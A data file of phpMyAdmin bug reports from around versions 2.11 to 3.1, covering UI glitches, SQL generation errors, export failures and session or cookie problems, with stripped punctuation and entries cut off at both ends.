To reproduce, delete timezone configuration from PHP and delete sessions and cookies.
Original URL https sourceforge.net p phpmyadmin bugs 2799 https sourceforge.net p phpmyadmin bugs 2799 Original author nijel","bug"
"24444","9163","undefined function ctype space ).
1\.
Please add ctype support to the PHP Requirements in the documentation.
2\.
Please output a message to the browser that ctype support need to be installed if it is missing.
Novell has ctype support in a separate package.
This applies to SuSE Linux Enterprise Server 10 http www.novell.com products linuxpackages server10 i386 php5 ctype.html http download.novell.com Download?buildid=fq1bbSYtUgk and to OpenSUSE 10.2, 10.3, 11.0 and 11.1 http download.opensuse.org repositories server php When package php5 ctype is not installed phpMyAdmin stops with that message in Apache s error log Call to undefined function ctype space ) in ... libraries sqlparser.lib.php on line 286 However, nothing about that error is shown in the browser.
Original URL https sourceforge.net p phpmyadmin bugs 2800 https sourceforge.net p phpmyadmin bugs 2800 Original author julianladisch Found in version 3.0.1","bug"
"24444","9164","Tooltips in navigation frame are wrong.
Over time as javascript changes titles, they got wrong Browse Structure is mixed up).
Original URL https sourceforge.net p phpmyadmin bugs 2801 https sourceforge.net p phpmyadmin bugs 2801 Original author nijel","bug"
"24444","9165","HeaderFlipType fake problems.
When displaying in horizontal rotated headers fake mode), characters after an ampersand in the column name are truncated; also, a superfluous separator is generated.
Thanks to Michal Biniek for the fix.
Original URL https sourceforge.net p phpmyadmin bugs 2802 https sourceforge.net p phpmyadmin bugs 2802 Original author lem9","bug"
"24444","9166","Various problems with table creation structure.
Hey, I ve seen the following issues for a while in phpmyadmin, and I wasn t sure if they were reported or not, but being that they haven t been fixed in 3.1.0, I ll assume they haven t been.
1\.
When creating table fields tbl create.php), the value of the A I checkbox is not carried over when you add more fields using the go button.
To reproduce, just make a new table, set a field to be auto increment, and hit go to add some more fields.
The A I value for the field you did before will no longer be selected.
2\.
When creating table fields, and adding additional fields using go , the Default entry field acts weird.
It ll sometimes start out as As defined instead of None .
It should probably remain consistent.
3\.
On any table structure screen tbl structure.php), the select box on the After option for new fields doesn t function correctly.
When you try to select an option, the box flickers and doesn t stay on the screen.
Holding the mouse button seems to make it work, but it obviously shouldn t be that way.
I m using Firefox 3.
It doesn t seem to happen when I use Internet Explorer 7.
Hope these reports help, and thanks for the continued great work on phpmyadmin.
Original URL https sourceforge.net p phpmyadmin bugs 2803 https sourceforge.net p phpmyadmin bugs 2803 Original author cooleo100d Found in version 3.1.0","bug"
"24444","9167","Incorrect size for view.
On the tables list, the size displayed for a view is the same as the previous table listed.
If the view is the first of the batch, undefined variables are used.
Original URL https sourceforge.net p phpmyadmin bugs 2804 https sourceforge.net p phpmyadmin bugs 2804 Original author lem9 Found in version 3.1.0","bug"
"24444","9168","Rename database operation does not copy triggers.
When I rename a database using the rename database operation stored procedures are copied but not triggers.
I m using MySQL 5.0.67, PHP 5.2.6, and phpMyAdmin 2.11.8.1.
Original URL https sourceforge.net p phpmyadmin bugs 2805 https sourceforge.net p phpmyadmin bugs 2805 Original author micah26 Found in version 2.11.8","bug"
"24444","9169","tiny typo vendros .
in libraries vendor config.php 12042 2008 11 30 13 08 10Z nijel reported in IRC by Sadie which vendros such as Linux distibutions might want to change.
line 5) Sadie vendros gt; vendors Original URL https sourceforge.net p phpmyadmin bugs 2806 https sourceforge.net p phpmyadmin bugs 2806 Original author windkiel Found in version Latest Git","bug"
"24444","9170","ForceSSL and http auth type.
I got a phpMyAdmin 3.1.0 install my config http phpfi.com 385631) with most importantly forcessl and http auth enabled.
When I log into phpMyAdmin using https \{ADDRESS\} \{PHPMYADMIN PATH\} as the url, I do not have any issues as long as I use correct login data, of course).
However, in case I use http \{ADDRESS\} \{PHPMYADMIN PATH\} as the initial url, I get automatically redirected to the https counterpart of that url see A username and password are being requested by https \{ADDRESS\} ... on the login popup).
Regardless of me entering correct login data or not, php throws the following error Fatal error Call to a member function getName ) on a non object in srv http default phpMyAdmin libraries common.inc.php on line 693 .
Judgin from the corresponding line of code GLOBALS[ theme ] = SESSION[ PMA Theme ] gt;getName ); ) this error appears to be somewhat related to phpMyAdmin s theme system.
Additionally, this very error message will keep popping up unless you delete all of phpMyAdmin s cookies, This thesis is being backed up by the fact that if you attempt to log in the same manner as mentioned above, but hit cancel on the login popup, the Welcome to phpMyAdmin and Wrong username password.
Access denied.
messages will be displayed in plain black on white i.e.
no template theme is applied).
As soon as you try to access the page again, the error message posted above will be thrown again.
I m running lighttpd 1.4.19 4ubuntu2 with php 5.2.6 2ubuntu4 on a 64bit ubuntu 8.10.
Original URL https sourceforge.net p phpmyadmin bugs 2807 https sourceforge.net p phpmyadmin bugs 2807 Original author actium Found in version 3.1.1","bug"
"24444","9171","AllowNoPasswordRoot error message is too vague.
When a user with a blank password for root tries to log in presuming AllowNoPasswordRoot=false), the error message is Access denied this is too vague and we should give them at least a hint as to what is wrong and ideally a tip on how to set the password.
I d gladly submit the patch myself but can t find the logic for dealing with this the error message appears to be strAccessDenied but the only references I find to that string in the codebase relate to the Allow Deny ruleset.
So hints are welcome.
Thanks Original URL https sourceforge.net p phpmyadmin bugs 2808 https sourceforge.net p phpmyadmin bugs 2808 Original author ibennetch","bug"
"24444","9172","Escaping special characters.
When adding rights for a user to access views in the database schema) vsa test, the special character will be escaped properly.
When adding additional rights for that user to access the tables, the special character will NOT be escaped and one will get a second database entry in the list of specific rights.
Original URL https sourceforge.net p phpmyadmin bugs 2809 https sourceforge.net p phpmyadmin bugs 2809 Original author rjonas Found in version 3.1.1","bug"
"24444","9173","edit fields loosing autoincrement setting.
table CREATE TABLE IF NOT EXISTS `table` `id` int 11) NOT NULL auto increment, `number` int 11) default 0 , PRIMARY KEY `id`) ) ENGINE=MyISAM; steps to reproduce edit both fields together = gt; checkbox auto increment is checked for field id set default dropdown to CURRENT TIMESTAMP click on save error message appears actual result checkbox auto increment is unchecked for field id when getting error message expected result checkbox auto increment should be checked for field id Original URL https sourceforge.net p phpmyadmin bugs 2810 https sourceforge.net p phpmyadmin bugs 2810 Original author blop nothing Found in version 3.1.1","bug"
"24444","9174","NULL checkbox do not work on foreign key column editation.
NULL checkbox do not work on foreign key column editation when editing a row, the NULL checkbox do not clear the previous value of column.
even if the value is deleted from textbox manually, the resulting query is wrong and results in 1452 Cannot add or update a child row a foreign key constraint fails ...
Original URL https sourceforge.net p phpmyadmin bugs 2811 https sourceforge.net p phpmyadmin bugs 2811 Original author paranoiq Found in version 3.1.0","bug"
"24444","9175","Commas for CSV Excel 2008 for Mac.
Exporting to CSV for Excel Mac is all I have tried) generates a file with ; delimiting not , .
Can this be fixed?
An example output file is attached... Stuart Original URL https sourceforge.net p phpmyadmin bugs 2812 https sourceforge.net p phpmyadmin bugs 2812 Original author stuchalk Found in version 3.1.1","bug"
"24444","9176","Can force search to fail.
Hi, An IRC user email address is domain free.fr, username rapsys) has encountered trouble with the search feature with a certain table structure, submitting a search results in the search page reloading rather than the expected results.
His table structure with demo data is attached, tested against the lastest svn 12150 and the 3.0.1.1 and 3.1.1 releases.
Original URL https sourceforge.net p phpmyadmin bugs 2813 https sourceforge.net p phpmyadmin bugs 2813 Original author ibennetch Found in version Latest Git","bug"
"24444","9177","Table operations adds row format .
phpMyAdmin 3.1.1 MySQL server 5.0.67 community nt MySQL client 5.0.67 PHP 5.2.6 When I click Go in the Table options Box on the Table Operations page row format=DYNAMIC row format=FIXED is added to the Row Statistics on the Table Structure page even if none of the options is changed.
before Format dynamic Collation utf8 general ci ... after Format dynamic Options row format=DYNAMIC Collation utf8 general ci ... switching to fixed Format fixed Options row format=FIXED Collation utf8 general ci ...
Original URL https sourceforge.net p phpmyadmin bugs 2814 https sourceforge.net p phpmyadmin bugs 2814 Original author virsacer Found in version 3.1.1","bug"
"24444","9178","show tables throws a notice.
on demo server http pma.cihar.com trunk config db sql.php?db=sakila show tables; Go) throws a notice Notice in .
libraries Table.class.php 250 Array to string conversion Backtrace .
libraries Table.class.php 250 strtoupper string Array) .
libraries Table.class.php 148 PMA Table isView string sakila, string TABLE NAMES, ) etc.
Original URL https sourceforge.net p phpmyadmin bugs 2815 https sourceforge.net p phpmyadmin bugs 2815 Original author windkiel Found in version Latest Git","bug"
"24444","9179","buggy setup lib common.inc.php.
howto reproduce first forcing an error,warning or notice like Notice in .
libraries Table.class.php 250 Array to string conversion by issuing, e.g., show tables; in phpMyAdmin 3.2.0 dev, SVN revision 12159, see bug 2468354) then calling http pma.cihar.com trunk config setup now shows the old notice again Notice in .
libraries Table.class.php 250 Array to string conversion Backtrace .
libraries Table.class.php 250 strtoupper string Array) .
libraries Table.class.php 148 PMA Table isView string sakila, string TABLE NAMES, ) ... etc Warning Cannot modify header information headers already sent by output started at srv http pma.cihar.com trunk config libraries Error.class.php 359) in srv http pma.cihar.com trunk config libraries header http.inc.php on line 23 ...,24 ...,25 ...,26 ...,29 phpMyAdmin 3.2.0 dev setup Overview Features ... etc I saw similar error reports before on IRC), e.g.
Warning Cannot modify header information headers already sent by output started at usr local apache2 htdocs myadmin libraries Error.class.php 357) in usr local apache2 htdocs myadmin libraries header http.inc.php on line 28 pma 311 and more) Original URL https sourceforge.net p phpmyadmin bugs 2816 https sourceforge.net p phpmyadmin bugs 2816 Original author windkiel Found in version 3.1.1","bug"
"24444","9180","Deleting row displays tbl structure, not contents.
When doing a SELECT FROM .. WHERE a LIKE b you get a list of results.
You press the red X in front of a row to delete it.
The next page shows you 1 row s) deleted.
, then after that the original query as expected, but below that, the table structure.
In previous versions it would just show the query output with now the respective row missing.
Pressing Refresh on the displayed query does bring the expected result set into view.
I can reproduce it at least in this case 1) Create a table with some fields, one of which is a varchar.
2) Add several rows, some of which have a common part in the varchar.
3) On the table page, Search to select a number of rows via a LIKE expression.
4) Delete one of the rows in the resultset.
Original URL https sourceforge.net p phpmyadmin bugs 2817 https sourceforge.net p phpmyadmin bugs 2817 Original author kink Found in version 3.1.1","bug"
"24444","9181","Editing row with CURRENT TIMESTAMP.
I ve got table with some columns.
One of these columns is TIMESTAMP type), this column s default value is CURRENT TIMESTAMP, and attributes is ON UPDATE CURRENT TIMESTAMP.
But when I m editing row in this table, current timestamp doesn t write.
Cur.
timestamp writes only, when I delete old value from the form and use Callendar and click Go Time.
I don t know whether it is erro or bug, but I was used to value be updated automaticaly upon editing row.
Please excuse my english, I m from Czech Republic.
Original URL https sourceforge.net p phpmyadmin bugs 2818 https sourceforge.net p phpmyadmin bugs 2818 Original author immensel Found in version 3.1.1","bug"
"24444","9182","phpMyAdmin shows wrong mySQL version.
Following pictures are pretty much self explainatory http img78.imageshack.us my.php?image=picture12ty2.png http img78.imageshack.us my.php?image=picture13zj4.png PHP 5.2.8, mySQL 5.1.30, lighttpd 1.5.0 Original URL https sourceforge.net p phpmyadmin bugs 2819 https sourceforge.net p phpmyadmin bugs 2819 Original author idaveit Found in version 3.1.1","bug"
"24444","9183","ANSI mode not supported DB rename and table move.
Performing DB rename operations or moving tables from one DB to the other these problems show up.
Tried it both in my server phpmyadmin 2.11.8.1 mysql d) 5.0.51a) and in the demo server 3.2.0 dev svn12170 mysql 5.1.19 beta mysqld 5.1.30 2 log).
With both versions problems occur.
This includes apache peaking at 100 CPU with connections open to mysql but without actually executing all queries.
Failing due to exceeding memory limits.
Failing due to hitting Maximum execution time of default) 30 seconds.
Steps to reproduce First create some content.
CREATE DATABASE `ansi test1` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; CREATE TABLE `ansi test1`.`bah` `me` int 10 ) unsigned NOT NULL AUTO INCREMENT , `you` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP , PRIMARY KEY `me` ) ) ENGINE = MYISAM DEFAULT CHARSET = latin1; INSERT INTO `ansi test1`.`bah` VALUES 1, NOW )); Set GLOBAL.sql mode to ANSI SET GLOBAL.sql mode= ANSI ; Now try to Rename the DB using the Operations interface.
In the demo server I get Fatal error Allowed memory size of 134217728 bytes exhausted tried to allocate 81 bytes) in srv http pma.cihar.com trunk config libraries Error.class.php on line 124 In my server I haven t reached memory limits but I do get maximum execution timeouts, idle sleeping mysql connections and apache peaking with 100 CPU.
If afterwards we remove the ANSI mode SET GLOBAL.sql mode= ; The DB renaming operation takes a fraction of second to run.
However if in sql mode= we copy the SQL code generated with the DB renaming operation and run it in ANSI mode it executes without problems SET GLOBAL.sql mode= ANSI ; CREATE DATABASE `ansi test2` DEFAULT CHARACTER SET latin1 COLLATE latin1 swedish ci; CREATE TABLE `ansi test2`.`bah` `me` int 10 ) unsigned NOT NULL AUTO INCREMENT , `you` timestamp NOT NULL DEFAULT CURRENT TIMESTAMP ON UPDATE CURRENT TIMESTAMP , PRIMARY KEY `me` ) ) ENGINE = MYISAM DEFAULT CHARSET = latin1; INSERT INTO `ansi test2`.`bah` SELECT FROM `ansi test1`.`bah` ; DROP TABLE `ansi test1`.`bah` ; DROP DATABASE `ansi test1` ; So it seems this is triggered by some other internal reason and not by the generated SQL.
Original URL https sourceforge.net p phpmyadmin bugs 2820 https sourceforge.net p phpmyadmin bugs 2820 Original author darking","bug"
"24444","9184","exporting nested query fails.
Trying to export the following sql will fail SELECT `id` FROM `users` WHERE 1 AND `id` IN SELECT `user id` FROM `services` WHERE `id` IN 64659, 64672, 42929, 42932, 42936, 42934, 42933, 42935 ) ) will generate this SELECT `user id` FROM `services` WHERE `users`.`id` =13861 ) OR `users`.`id` =28315 ) OR `users`.`id` =12209818 ) OR `users`.`id` =12216974 ) OR `users`.`id` =12216975 ) OR `users`.`id` =12216976 ) OR `users`.`id` =12216977 ) OR `users`.`id` =12221801 ) ) AND `id` IN 64659, 64672, 42929, 42932, 42936, 42934, 42933, 42935 ) ) ) LIMIT 81149 which is not correct.
The export will therefore fail.
Original URL https sourceforge.net p phpmyadmin bugs 2821 https sourceforge.net p phpmyadmin bugs 2821 Original author tofsjonas","bug"
"24444","9185","Don t display relation, if set comment on a table.
On the top of the table structure page, the relation information displayed correctly, if not set a comment on the table.
But if set a comment, the relation information disappeared, only the comment displayed.
Original URL https sourceforge.net p phpmyadmin bugs 2822 https sourceforge.net p phpmyadmin bugs 2822 Original author farkaspok Found in version 3.1.2","bug"
"24444","9186","Error creating new coloum in table with defaul as null.
Sorry if i set this up wrong, first time.
When i try to make a new coloum in an already existing table, and i set the default as null, this is the resulting query ALTER TABLE `projects groups` ADD `test` VARCHAR 52 ) NOT NULL DEFAULT NULL Which makes mysql cry 1067 Invalid default value for test Some info Apache 2.2.11 Win32) DAV 2 mod ssl 2.2.11 OpenSSL 0.9.8i mod autoindex color PHP 5.2.8 MySQL client version 5.1.30 PHP extension mysql PHP Version 5.2.8 PhpMyAdmin version 3.1.2 XAMPP windows) version 1.7.0 Original URL https sourceforge.net p phpmyadmin bugs 2823 https sourceforge.net p phpmyadmin bugs 2823 Original author quackstar Found in version 3.1.2","bug"
"24444","9187","row delete forwards to http localhost instead actual URL.
I am running dev db phpmyadmin 2.11.9.4 under linux gentoo from the standard package not a manual install).
All functionality is fine except one When I list a table content and then try to delete a row by clicking on the red X in front of that row, the row gets deleted but the frame is forwarded to an invalid URL.
This is reliably reproducible.
Button HTML lt;td align= center gt; lt;a href= sql.php?db=lingerie amp;amp;table=links amp;amp;token=0440c16948333f080efd3349f6e2ed32 amp;amp;sql query=DELETE FROM 60links 60 WHERE 60links 60.
60parent 60 3D 801 AND 60links 60.
60child 60 3D 81 LIMIT 1 amp;amp;zero rows=The row has been deleted amp;amp;goto=sql.php 3Fdb 3Dlingerie 26table 3Dlinks 26token 3D0440c16948333f080efd3349f6e2ed32 26sql query 3DSELECT 2B 252A 2BFROM 2B 2560links 2560 26zero rows 3DThe 2Brow 2Bhas 2Bbeen 2Bdeleted 26goto 3Dtbl structure.php onclick= return confirmLink this, DELETE FROM `links` WHERE `links`.`parent` = 801 AND `links`.`child` = 81 LIMIT 1 ) gt; lt;img class= icon width= 16 height= 16 src= .
themes original img b drop.png alt= Delete title= Delete gt; lt; a gt; lt; td gt; Source URL Frame) http mydomain.com phpmyadmin sql.php?db=lingerie table=links token=0440c16948333f080efd3349f6e2ed32 goto=tbl structure.php back=tbl structure.php pos=0 Target URL for frame as reported by firrefox) http localhost phpmyadmin sql.php?db=lingerie table=links token=0440c16948333f080efd3349f6e2ed32 sql query=SELECT 2A FROM 60links 60 zero rows=The row has been deleted goto=tbl structure.php message=Deleted rows 3A 26nbsp 3B1 28Query took 0.0007 sec 29 as I said, all other links, forms etc on the site work fine.
This happens after the row was deleted so I assume that after deleting the page gets forwarded to another page and there the wrong URL is forwarded.
My config file password blanked) lt;?php Generated configuration file Generated by phpMyAdmin 2.11.2.2 setup script by Michal amp; 268;iha amp; 345; lt;michal cihar.com gt; Version Id setup.php 10748 2007 10 10 07 30 59Z cybot tm Date Mon, 11 Feb 2008 02 45 26 GMT Servers configuration i = 0; Server localhost config root) [1] i ; cfg[ Servers ][ i][ host ] = localhost ; cfg[ Servers ][ i][ extension ] = mysql ; cfg[ Servers ][ i][ connect type ] = tcp ; cfg[ Servers ][ i][ compress ] = false; cfg[ Servers ][ i][ auth type ] = config ; cfg[ Servers ][ i][ user ] = root ; cfg[ Servers ][ i][ password ] = ; cfg[ Servers ][ i][ pmadb ] = phpmyadmin ; cfg[ Servers ][ i][ bookmarktable ] = pma bookmark ; cfg[ Servers ][ i][ relation ] = pma relation ; cfg[ Servers ][ i][ table info ] = pma table info ; cfg[ Servers ][ i][ table coords ] = pma table coords ; cfg[ Servers ][ i][ pdf pages ] = pma pdf pages ; cfg[ Servers ][ i][ column info ] = pma column info ; cfg[ Servers ][ i][ history ] = pma history ; cfg[ Servers ][ i][ designer coords ] = pma designer coords ; End of servers configuration ?
gt; Original URL https sourceforge.net p phpmyadmin bugs 2824 https sourceforge.net p phpmyadmin bugs 2824 Original author tokyoahead Found in version 2.11.9.x","bug"
"24444","9188","readonly mode.
I was very frustrated.
I attempted to just view a database with phpmyadmin.
However I pressed something that caused An index has been added on option value Query took 0.1784 sec ) ALTER TABLE `wp options` ADD FULLTEXT `option value` And now I don t know how to change it back.
This is all because phpmyadmin has no distinction between readonly mode and editing mode.
I.E., the user cannot make phpmyadmin only give him the buttons to view, but not to edit, if he so wants.
It is like a car.
Junior please wait in the car.
Mommy will be right back.
However there is no way to turn the motor off, take out the keys, or even put it into PARK gear.
So dangerous.
Anyway, now if I attempt to reverse what I did, I will probably do more damage.
This shows you also need an UNDO button.
Yes, have backups ready .
OK, I have now restored via a backup, thank goodness.)
In http bugs.debian.org cgi bin bugreport.cgi?bug=427100 , we see Why don t you just create a MySQL user that has no write privileges?
That seems like the perfect solution to me and is handled by phpMyAdmin just fine.
Rather than to give every application that provides a view on the database a readonly option, attack the problem at the source.
Well all I know is even that means we must somehow change things on disk and must know how to make that change.
I am saying Firefox wouldn t change the files it browses... why can t I sometimes make phpMyAdmin act like firefox?
Original URL https sourceforge.net p phpmyadmin bugs 2825 https sourceforge.net p phpmyadmin bugs 2825 Original author jidanni","bug"
"24444","9189","allow turning off horizontally scrolling.
There is no guarantee you will not horizontally scroll.
E.g., this item caused the browser to horizontally scroll option id blog id option name option value autoload Edit Delete 124 0 rss c9db569cb388e160e4b86ca1ddff84d7 O 9 MagpieRSS 17 \{s 6 parser ;i 0;s 12 current... no Original URL https sourceforge.net p phpmyadmin bugs 2826 https sourceforge.net p phpmyadmin bugs 2826 Original author jidanni","bug"
"24444","9190","Comments are stripped when editing stored proc..
When creating or editing a stored function or stored procedure, single line and multi line comments are stripped out.
This is not expected behaviour; it should be possible to add comments to stored code to enhance maintenance and readability.
To reproduce 1) Log into phpMyAdmin, using a database where the user has sufficient rights to create a stored procedure 2) Open the SQL tab of the database 3) Change the delimiter to or similar and add the following code CREATE PROCEDURE myproc ) BEGIN this comment will be stripped select now ); this comment will also be stripped END 4) Click the Go button 5) Open the Structure tab of the database 6) Click on Routines, then edit the myproc stored procedure 7) See that the comments are gone Expected behaviour would be that the comments are stored along with the stored procedure function code.
Note The stripping of comments happens when saving a stored procedure function, not when just viewing it.
For instance, it s possible to do the following 1) Create a stored procedure function with MySQL Query Browser and use comments 2) View the stored procedure function with phpMyAdmin and see the comments Original URL https sourceforge.net p phpmyadmin bugs 2827 https sourceforge.net p phpmyadmin bugs 2827 Original author bkuik Found in version 3.1.2","bug"
"24444","9191","Unable to set the default value.
The structure of the table has default value .
When I click Save button, value is not set to 1.
In PMA 2.11.4 it works.
PHP 5.2.8, MySQL 5.0.45, Windows XP.
Original URL https sourceforge.net p phpmyadmin bugs 2828 https sourceforge.net p phpmyadmin bugs 2828 Original author bar boss Found in version 3.1.2","bug"
"24444","9192","HTML encoding mixed with non UTF8 connection coll..
It seems like that PMA is ignoring the MySQL connection collation you set or you forgot to use utf8 encode ) for example, when displaying values.
How to reproduce 1) Install a MySQL 5 GA server with default configuration gt; the default charset should be UTF 8) 2) Create a new database collation latin1) 3) Import the attached sql dump 4) Open your PMA and set the MySQL connection collation to latin1 swedish ci 5) Go to your new database and display the data in the test table.
Result You will see garbled data also known as funny characters; I attached a screenshot of my view) When you change the encoding in your browser to something like ISO , the shown data in PMA will be displayed correctly.
I also tested previous versions of PMA.
In v3.0.1.1 this is also not working.
In v2.11.9.1 it is working...
Original URL https sourceforge.net p phpmyadmin bugs 2829 https sourceforge.net p phpmyadmin bugs 2829 Original author whissi Found in version 3.1.2","bug"
"24444","9193","notices in tbl structure.php when db name is ciphers only .
select create a db, e.g., 123 select create any table click structure result demo trunk Notice in .
tbl structure.php 603 , 605, 611, 613) Uninitialized string offset 0 Backtrace Original URL https sourceforge.net p phpmyadmin bugs 2830 https sourceforge.net p phpmyadmin bugs 2830 Original author windkiel Found in version Latest Git","bug"
"24444","9194","Designer compound key not shown.
Tables with combined Primary Keys are displaying only one column as Primary on Designer mode.
I attached an screenshot with appointments.
Original URL https sourceforge.net p phpmyadmin bugs 2831 https sourceforge.net p phpmyadmin bugs 2831 Original author wagnerluis1982","bug"
"24444","9195","Undefined offset in relation.lib.php on line 389.
When I select the Search tab, the following error messages display Notice Undefined offset 0 in ... libraries relation.lib.php on line 389 Warning Invalid argument supplied for foreach ) in ... libraries relation.lib.php on line 389 Gentoo Portage installation MySQL Server version 5.0.70 log MySQL client version 5.0.70 phpMyAdmin 2.11.9.4 Original URL https sourceforge.net p phpmyadmin bugs 2832 https sourceforge.net p phpmyadmin bugs 2832 Original author danorton Found in version 2.11.9.x","bug"
"24444","9196","Clicking browse gives a browse structure hybrid.
When I clicked on the table name in the left pane, I was presented with a query I would expect for a browse on the table but the LIMIT was built in correctly.
The mySQL error I would expect that would be given with the query was presented as well.
In addition to that, I was given the structure of the table.
Every table gave the same result from the left pane.
If I clicked the browse button on any table in the right pane, it would also give the same result.
The only way I could resolve this was to close Internet Explorer 7 and open a new session.
After that, it worked as expected.
MySQL Server Localhost via UNIX socket Server version 5.0.45 Protocol version 10 User localhost MySQL charset UTF 8 Unicode utf8) Web server Apache 2.2.3 Red Hat) MySQL client version 5.0.45 PHP extension mysql phpMyAdmin Version information 3.1.2 Original URL https sourceforge.net p phpmyadmin bugs 2833 https sourceforge.net p phpmyadmin bugs 2833 Original author one mastert Found in version 3.1.2","bug"
"24444","9197","sidebar link activates bookmark of same name.
If there s a SQL bookmark that s of the same name as a table, view, or other item that shows up in the side bar.
When you click the item s link in the side bar it will run the stored SQL bookmarked query.
For clarity, an example.
If I have two tables products and attributes, and I create an SQL bookmark named attributes that stores the query SELECT FROM products; then when I click on the attributes table link in the sidebar it will actually show me the products table.
Original URL https sourceforge.net p phpmyadmin bugs 2834 https sourceforge.net p phpmyadmin bugs 2834 Original author firebornx","bug"
"24444","9198","Problem when copying views.
When I copy DB into other DB, views are not copied.
Instead of this, PMA creates a copy of the one view in the source DB with name my Source DB Name .
Sorry for my bad English..
Original URL https sourceforge.net p phpmyadmin bugs 2835 https sourceforge.net p phpmyadmin bugs 2835 Original author nick951 Found in version 3.1.2","bug"
"24444","9199","csv export doesn t export the used statement.
I use phpMyAdmin 3.1.2.
I want to execute a statement and export the result to a csv format.
The result of the used statement is correct.
When I click export and then csv the now shown data has nothing to do with the entered statement.
It seems to be the whole last used table dumped in a csv format.
The same statement used and exported in a phpMyAdmin 2.11.6 works perfectly fine.
The used statement looks like SELECT DISTINCT p.products model AS SKU, pd.products name AS Product Name , cd.categories name AS Kategorie FROM `products` AS p LEFT JOIN products description AS pd ON p.products id = pd.products id LEFT JOIN products to categories AS p2c ON p.products id = p2c.products id LEFT JOIN categories AS c ON p2c.categories id = c.categories id LEFT JOIN categories description AS cd ON c.parent id = cd.categories id WHERE p.products model gt;10000 AND c.parent id lt; gt; 0 AND c.parent id lt; gt; 18 ORDER BY p.products model DESC; The database is a xt commerce shop system.
Original URL https sourceforge.net p phpmyadmin bugs 2836 https sourceforge.net p phpmyadmin bugs 2836 Original author dennis m Found in version 3.1.2","bug"
"24444","9200","[Version 3.1.2] PMA TT init JS constant undefined.
Error message ============= PMA TT init is not defined Location ======== script main.php?token=b9e4f998b9bf4627a60b5ebc76ccecd9 line 41 code window.parent.addEvent window, load , PMA TT init); ENV === Apache 2.2.4 Unix) mod ssl 2.2.4 OpenSSL 0.9.8c PHP 5.2.8 mod perl 2.0.2 Perl v5.8.4 MySQL 5.0.33 Original URL https sourceforge.net p phpmyadmin bugs 2837 https sourceforge.net p phpmyadmin bugs 2837 Original author freerbil","bug"
"24444","9201","Hover over balloon don t show on Firefox 3.0.6.
I have phpMyAdmin 3.11 Firefox 3.0.6 When I login to the console and hover over the icons buttons, a balloon is supposed to show up with a small description.
I d say that a rough 90 of the balloons don t show up.
When I say don t show up I mean the balloon is not shown completely.
Really, the balloon shown shows up, but there s nothing in it.
A good example is Again, on Firefox 3.0.6 Login to console.
There are 4 icons right below the logo.
The balloons don t work on the first and last icons, but they work on the icons in the middle.
On the other hand, all balloons work on Internet Explorer.
Original URL https sourceforge.net p phpmyadmin bugs 2838 https sourceforge.net p phpmyadmin bugs 2838 Original author lucorium Found in version 3.1.1","bug"
"24444","9202","Using DELIMITER produces infinite cycle.
If we use sql command DELIMITER in sql query phpmyadmin never ending, probably infinite cycle, 100 procesor load.
Win XP SP3, Apache 2.2, PHP 5.2.6, Mysql 5.1.31 FreeBSD, Apache 2.2, PHP 5.2.7, Mysql 5.1.29 Example DELIMITER DROP TRIGGER !50032 IF EXISTS `svn`.`fakt vydane typ insert` CREATE !50017 DEFINER = root localhost TRIGGER `fakt vydane typ insert` AFTER INSERT ON `fakt vydane typ` FOR EACH ROW BEGIN INSERT INTO action log tabulka,id,akce,user,datum) VALUES fakt vydane typ ,NEW.ID, I ,NEW.id user,NOW )); END; DELIMITER ; Original URL https sourceforge.net p phpmyadmin bugs 2839 https sourceforge.net p phpmyadmin bugs 2839 Original author dddoser Found in version 3.1.2","bug"
"24444","9203","Signon.auth.lib.php can cause dublicate session cookies.
When using the Single Sign on feature of PhpMyAdmin, a second session cookie is created which is basically a copy of the integrating application s session cookie as defined by cfg[ Servers ][ i][ SignonSession ] .
When PMA auth check ) is called in signon.auth.lib.php, the function switches the session to the one defined in the configuration variable above.
The problem though is that the cookie path can be incorrect defined to be phpmyadmin by default) because there is no way to configure it to go elsewhere.
What would be ideal would be that in cfg[ Servers ][ i] we be able to configure our session s session set cookie param arguments to prevent duplicate cookies appearing with the same content but different paths.
Original URL https sourceforge.net p phpmyadmin bugs 2840 https sourceforge.net p phpmyadmin bugs 2840 Original author binarycleric Found in version 2.11.7.1","bug"
"24444","9204","phantom data displayed in NULL column during record edit.
Run the following CREATE TABLE IF NOT EXISTS `null text test` `text1` text NOT NULL, `text2` text ) ENGINE=MyISAM DEFAULT CHARSET=latin1; INSERT INTO `null text test` `text1`, `text2`) VALUES This text is in column 1. , NULL); Note that the second column is set to NULL.
In phpMyAdmin, browse this newly created table and edit the record.
The second column has the Null box checked, but the value field for the second column contains whatever value is found in the first column.
If no changes are made to the second column value field, when the record is saved, the second column will remain set to NULL.
However, if the user chooses to delete the contents of the second column value field and then saves the record, the second column will get set to empty, rather than NULL.
So until this bug is fixed, the user should either not make any changes to the value displayed in the field and trust that it will remain NULL when saved, OR click on the Null check box once to clear the check mark and then a second time to mark it again.
The second click will also clear the phantom data that was erroneously displayed as a value.
Ubuntu Hardy) 2.6.18 53.1.13.el5.028stab053.10PAE 1 SMP Tue Apr 1 15 44 34 MSD 2008 i686 GNU Linux MySQL 5.0.51 PHP Version 5.2.4 2ubuntu5.4 phpMyAdmin version 3.1.1 Original URL https sourceforge.net p phpmyadmin bugs 2841 https sourceforge.net p phpmyadmin bugs 2841 Original author danpass Found in version 3.1.1","bug"
"24444","9205","Request URI Too Large error from redirect header.
After running a query using the text area in the SQL tab in database scope, a successful execution is followed by a redirect to db sql.php.
In my case the executed query was the create statement for a large table, of which the structure was more the 8000 chars.
The whole statement is passed as a GET var to db sql.php via a Location header.
This results in an error given by Apache Request URI Too Large).
After some digging I see no reason why this redirect is necessary in the first place.
As a test case I replaced the call to PMA sendHeaderLocation in libraries db table exists.lib.php with include db sql.php ); This gave me the expected result without any error, since the redirection step is skipped.
This however needs further testing before I dare to commit this.
A more general solution would be to extend PMA sendHeaderLocation ) to POST a form instead of sending a header in cases where the url is too long.
I ll also look into this.
This is related to to bugs 1253125 and 1490556 Original URL https sourceforge.net p phpmyadmin bugs 2842 https sourceforge.net p phpmyadmin bugs 2842 Original author helmo Found in version Latest Git","bug"
"24444","9206","SQL MODE not saved during Partial Import.
channeling AltaVida at http drupal.org node 204411 An interesting thing I noticed about PHPMyAdmin and NO AUTO VALUE ON ZERO As mentioned, more recent versions of PHPMyAdmin add SET SQL MODE= NO AUTO VALUE ON ZERO to the beginning of a dump file.
However if your database is large, on import you can use the Partial Import option which is described as Allow interrupt of import in case script detects it is close to time limit.
This might be good way to import large files, however it can break transactions.
